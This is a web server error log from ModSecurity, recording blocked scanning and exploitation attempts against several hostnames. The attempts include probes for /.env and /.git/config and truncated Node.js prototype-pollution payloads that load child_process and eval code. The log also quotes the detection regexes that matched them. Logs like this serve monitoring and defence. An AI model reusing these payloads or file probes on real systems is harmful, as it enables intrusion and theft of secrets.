[Mon Dec 22 07:53:34.039055 2025] [:error] [pid 899041] [client 64.225.75.246:54058] [client 64.225.75.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUjq7kjUWwmX9_yPUUjjoQAAAAg"]
[Mon Dec 22 07:53:34.039310 2025] [:error] [pid 899041] [client 64.225.75.246:54058] [client 64.225.75.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUjq7kjUWwmX9_yPUUjjoQAAAAg"]
[Mon Dec 22 07:53:34.039474 2025] [:error] [pid 899041] [client 64.225.75.246:54058] [client 64.225.75.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUjq7kjUWwmX9_yPUUjjoQAAAAg"]
[Mon Dec 22 07:53:36.036061 2025] [:error] [pid 899028] [client 64.225.75.246:54072] [client 64.225.75.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUjq8I1UmSoOhwfDSG0howAAAAY"]
[Mon Dec 22 07:53:36.036282 2025] [:error] [pid 899028] [client 64.225.75.246:54072] [client 64.225.75.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUjq8I1UmSoOhwfDSG0howAAAAY"]
[Mon Dec 22 07:53:36.036432 2025] [:error] [pid 899028] [client 64.225.75.246:54072] [client 64.225.75.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUjq8I1UmSoOhwfDSG0howAAAAY"]
[Tue Dec 23 02:29:08.245410 2025] [:error] [pid 918029] [client 46.101.195.176:2850] [client 46.101.195.176] ModSecurity: Rule 7f2f26f6b898 [id "932110"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "258"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUnwZDg7WdksJHWlNIjgUgAAAAM"]
[Tue Dec 23 02:29:08.245529 2025] [:error] [pid 918029] [client 46.101.195.176:2850] [client 46.101.195.176] ModSecurity: Rule 7f2f26f62760 [id "932115"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "298"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUnwZDg7WdksJHWlNIjgUgAAAAM"]
[Tue Dec 23 02:29:08.247267 2025] [:error] [pid 918029] [client 46.101.195.176:2850] [client 46.101.195.176] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: eval(user_code); Promise.resolve(val).then(function(v) { var res_str = (typeof v === 'object') ? JSON.stringify(v) : String(v); try { res_str = zlib.deflateSync(res_str); } catch(e) {} var res_hex = global[String.fromCharCode(66,117,102,102,101,114)].from(res_str).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: res_hex })); }).catch(function(e) { reject(Object.assign(new Er..."] [severity "CRITICAL"] [ver "OWASP_C [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUnwZDg7WdksJHWlNIjgUgAAAAM"]
[Tue Dec 23 02:29:08.247404 2025] [:error] [pid 918029] [client 46.101.195.176:2850] [client 46.101.195.176] ModSecurity: Rule 7f2f26741bf8 [id "933210"][file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUnwZDg7WdksJHWlNIjgUgAAAAM"]
[Tue Dec 23 02:29:08.247560 2025] [:error] [pid 918029] [client 46.101.195.176:2850] [client 46.101.195.176] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUnwZDg7WdksJHWlNIjgUgAAAAM"]
[Tue Dec 23 02:29:08.247702 2025] [:error] [pid 918029] [client 46.101.195.176:2850] [client 46.101.195.176] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUnwZDg7WdksJHWlNIjgUgAAAAM"]
[Tue Dec 23 02:29:08.249422 2025] [:error] [pid 918029] [client 46.101.195.176:2850] [client 46.101.195.176] ModSecurity: Rule 7f2f26bb9320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUnwZDg7WdksJHWlNIjgUgAAAAM"]
[Tue Dec 23 02:29:08.249556 2025] [:error] [pid 918029] [client 46.101.195.176:2850] [client 46.101.195.176] ModSecurity: Rule 7f2f26bae030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUnwZDg7WdksJHWlNIjgUgAAAAM"]
[Tue Dec 23 02:29:08.256612 2025] [:error] [pid 918029] [client 46.101.195.176:2850] [client 46.101.195.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUnwZDg7WdksJHWlNIjgUgAAAAM"]
[Tue Dec 23 02:29:08.256788 2025] [:error] [pid 918029] [client 46.101.195.176:2850] [client 46.101.195.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUnwZDg7WdksJHWlNIjgUgAAAAM"]
[Tue Dec 23 02:58:17.009970 2025] [:error] [pid 918027] [client 167.99.245.151:31120] [client 167.99.245.151] ModSecurity: Rule 7f2f26f6b898 [id "932110"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "258"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUn3OZZhdMB01Ad2vN9i_AAAAAA"]
[Tue Dec 23 02:58:17.010060 2025] [:error] [pid 918027] [client 167.99.245.151:31120] [client 167.99.245.151] ModSecurity: Rule 7f2f26f62760 [id "932115"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "298"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUn3OZZhdMB01Ad2vN9i_AAAAAA"]
[Tue Dec 23 02:58:17.011687 2025] [:error] [pid 918027] [client 167.99.245.151:31120] [client 167.99.245.151] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: eval(user_code); Promise.resolve(val).then(function(v) { var res_str = (typeof v === 'object') ? JSON.stringify(v) : String(v); try { res_str = zlib.deflateSync(res_str); } catch(e) {} var res_hex = global[String.fromCharCode(66,117,102,102,101,114)].from(res_str).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: res_hex })); }).catch(function(e) { reject(Object.assign(new Er..."] [severity "CRITICAL"] [ver "OWASP_C [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUn3OZZhdMB01Ad2vN9i_AAAAAA"]
[Tue Dec 23 02:58:17.011832 2025] [:error] [pid 918027] [client 167.99.245.151:31120] [client 167.99.245.151] ModSecurity: Rule 7f2f26741bf8 [id "933210"][file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUn3OZZhdMB01Ad2vN9i_AAAAAA"]
[Tue Dec 23 02:58:17.011983 2025] [:error] [pid 918027] [client 167.99.245.151:31120] [client 167.99.245.151] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUn3OZZhdMB01Ad2vN9i_AAAAAA"]
[Tue Dec 23 02:58:17.012131 2025] [:error] [pid 918027] [client 167.99.245.151:31120] [client 167.99.245.151] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUn3OZZhdMB01Ad2vN9i_AAAAAA"]
[Tue Dec 23 02:58:17.013827 2025] [:error] [pid 918027] [client 167.99.245.151:31120] [client 167.99.245.151] ModSecurity: Rule 7f2f26bb9320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUn3OZZhdMB01Ad2vN9i_AAAAAA"]
[Tue Dec 23 02:58:17.013960 2025] [:error] [pid 918027] [client 167.99.245.151:31120] [client 167.99.245.151] ModSecurity: Rule 7f2f26bae030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUn3OZZhdMB01Ad2vN9i_AAAAAA"]
[Tue Dec 23 02:58:17.020454 2025] [:error] [pid 918027] [client 167.99.245.151:31120] [client 167.99.245.151] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUn3OZZhdMB01Ad2vN9i_AAAAAA"]
[Tue Dec 23 02:58:17.020621 2025] [:error] [pid 918027] [client 167.99.245.151:31120] [client 167.99.245.151] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUn3OZZhdMB01Ad2vN9i_AAAAAA"]
[Tue Dec 23 19:24:58.446663 2025] [:error] [pid 920446] [client 186.249.148.94:36861] [client 186.249.148.94] ModSecurity: Warning. Pattern match "\\\\b(?:keep-alive|close),\\\\s?(?:keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "311"] [id "920210"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aUreepDYTgxzg14IlwuQ9AAAAAE"]
[Tue Dec 23 23:15:32.779763 2025] [:error] [pid 932698] [client 62.60.131.162:62659] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUsUhGp_X6OiVda17XVEHAAAAAg"]
[Tue Dec 23 23:15:32.779993 2025] [:error] [pid 932698] [client 62.60.131.162:62659] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUsUhGp_X6OiVda17XVEHAAAAAg"]
[Tue Dec 23 23:15:32.780203 2025] [:error] [pid 932698] [client 62.60.131.162:62659] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUsUhGp_X6OiVda17XVEHAAAAAg"]
[Wed Dec 24 04:52:07.650318 2025] [authz_core:error] [pid 942101] [client 164.92.244.132:56558] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Dec 24 04:52:10.616177 2025] [:error] [pid 944506] [client 164.92.244.132:42018] [client 164.92.244.132] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUtjakdGcMI4QBzDF13EnAAAABA"]
[Wed Dec 24 04:52:10.616441 2025] [:error] [pid 944506] [client 164.92.244.132:42018] [client 164.92.244.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUtjakdGcMI4QBzDF13EnAAAABA"]
[Wed Dec 24 04:52:10.616610 2025] [:error] [pid 944506] [client 164.92.244.132:42018] [client 164.92.244.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUtjakdGcMI4QBzDF13EnAAAABA"]
[Wed Dec 24 04:52:11.614852 2025] [:error] [pid 942099] [client 164.92.244.132:42024] [client 164.92.244.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUtjaweXSDK58jw1o5esGgAAAAA"]
[Wed Dec 24 04:52:11.615075 2025] [:error] [pid 942099] [client 164.92.244.132:42024] [client 164.92.244.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUtjaweXSDK58jw1o5esGgAAAAA"]
[Wed Dec 24 04:52:11.615233 2025] [:error] [pid 942099] [client 164.92.244.132:42024] [client 164.92.244.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUtjaweXSDK58jw1o5esGgAAAAA"]
[Wed Dec 24 04:52:13.632421 2025] [:error] [pid 942100] [client 164.92.244.132:42036] [client 164.92.244.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUtjbfl7Z5lr6dAW68DebQAAAAE"]
[Wed Dec 24 04:52:13.632659 2025] [:error] [pid 942100] [client 164.92.244.132:42036] [client 164.92.244.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUtjbfl7Z5lr6dAW68DebQAAAAE"]
[Wed Dec 24 04:52:13.632804 2025] [:error] [pid 942100] [client 164.92.244.132:42036] [client 164.92.244.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUtjbfl7Z5lr6dAW68DebQAAAAE"]
